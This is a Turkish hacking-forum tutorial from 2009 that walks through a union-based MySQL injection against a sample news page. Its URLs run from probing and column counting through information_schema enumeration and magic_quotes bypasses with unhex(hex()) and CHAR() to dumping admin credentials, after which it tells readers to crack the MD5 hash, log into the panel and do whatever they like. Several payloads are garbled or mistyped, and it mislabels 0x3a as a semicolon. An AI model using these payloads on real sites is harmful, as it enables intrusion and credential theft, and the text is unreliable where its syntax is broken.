Root > Documents > Web Güvenlik Açıkları > Deep MySQL Injection
Cyber-Warrior.Org \ Doküman \ Web Güvenlik Açıkları > Deep MySQL Injection
Madde
  Yazar : RexibLe
  Date : 22.11.2009 14:13:31
 
# Deep MySQL Injection
 

Öncelikle merhaba bir ögretme azmi geldi bir döküman yazayimda arkdaslarimla paylasiyim dedim neyse lafi fazla uzatmadan baslayalim.

Bu dökümanimda sizlere mysql injection detaylarini göstericem inebildigim kadariyla .
Öncelikle bilmenizi isterim ki mysql injection olayinda update yoktur sadece verileri okuyabilirsiniz örnegin admin id pass alirsiniz panele girer basarsiniz mesela.

Örnek Site :

 color=#0000cc http://www.sitemiz.com/haber.php?id=8

Simdi hata verdirmeye çalisalim. 

 color=#0000cc http://www.sitemiz.com/haber.php?id=8 yaptik.

Böyle bir haber kaydi bulunamadi. diyor (mesela)

Site sonuna

and 1=0 eklersek hata vermesi
and 1=1 eklersek normal açilmasi lazim.

Yapiyoruz..

 color=#0000cc http://www.sitemiz.com/haber.php?id=8 and 1=0 hata verdi
 color=#0000cc http://www.sitemiz.com/haber.php?id=8 and 1=1 normal açildi

Basliyoruz öncelikle kolon sayisini bulmamiz lazim bunun için.

Order+by kullanicaz ama nasil ?

 color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1 gibi
Bisey yok sonuna "--" ekliyoruz .
 color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1-- yapiyoruz sayfa normal açildi bir problem yok.
 color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+2-- yapiyoruz hata verdi.

Bundan su sonucu çikartiyoruz colon sayisi 1 simdi ise koyuluyoruz.
 color=#0000cc http://www.sitemiz.com/haber.php?id=8+union+select+1-- bakin -- unutmayalim.
Birsey yok neden yok haber.php?id= den sonra - koymadim söle.

 color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+1--

Evet 1 ekrana vurdu.Asama asama devam edelim ..

1.DataBase adlarini çekelim.

Bunun için ekrana vuran sayinin yerine 

group_concat(schema_name)
yaziyoruz ve en sonra +from+information_schmea.schemata yaziyoruz söle.

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatschema_name+from+information_schmea.schemata--

Birsey vurmadi yaptigimiz isden de eminiz sorun ne ?

Sorun magic_quotes_gpc peki napicaz ?

Unhex(hex()) metodunu uyguluyacaz ve

sayinin yerine yazdigimiz group_concat(schema_name) i

unhex(hex(group_concat(schema_name))) yapicaz

deniyelim.

h color=#0000cc ttp://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatschema_name+from+information_schema.schemata--

evet

Tablo adlarini ögrenecegiz

gene ayni yerden bu sefer grop_concat(schema_name) i group_concat(table_name)

olarak degistiriyoruz yani söle.

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name)))

sonunada

+from+information_schema.tables yaziyoruz ve tam olarak

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from+information_schema.tables-- oldu

sonunda -- unutmayalim .

evet tablolar geldi ama alakasiz tabloalr geldi napcaz.

sonunda +where+table_name=database() ekliyicez

sonuç ;

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from+information_schema.tables+where+table_name=database()

evet tablolar ekrana yansidi

Bir tablo adi seçiyoruz örnegin admin var diyelim

hemen adminin kolonlarini çekicez

gene ayni bu sefer ayni yeri group_concat(column_name) oarlak degistirip sonuna
+from+information_schema.columns+where+table_name= CHAR(97, 100, 109, 105, 110, 108, 101, 114)--
ekliyoruz olmadi ?

Neden magic_quates_gpc açik napicaz adminler i charlicaz yani ?
adminler=CHAR(97, 100, 109, 105, 110, 108, 101, 114) bu olucak nasil mysql char haline getirirsiniz ? firefox hackarbar eklentisi bunu yapabilir en basitinden

evet simdi url böle oldu

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatcolounm_name+from+information_schema.columns+where+table_name=CHAR97, 100, 109, 105, 110, 108, 101, 114)--

evet geldi ekrana neymis

kad ve sifre kolonlari varmis simdi onlardaki verileri çekelim

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatkad,0x3a,sifre+from+adminler-- yapiyoruz

buradaki 0x3a ";" hex halidir sasirtmasin

evet ekrana geldi
kullanici adi admin sifre md5 halde

admin:21232f297a57a5a743894a0e4a801fc3:

simdi bunu herhangi bi sekilde kiriyoruz sifre "admin" mis
panele girip login oluyoruz ordan gerisi sizin fanteziniz ne yaparsaniz yapin.

Selametle arkadaslar..

@RexibLe ~ Cyber Warrior TIM
   
   
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©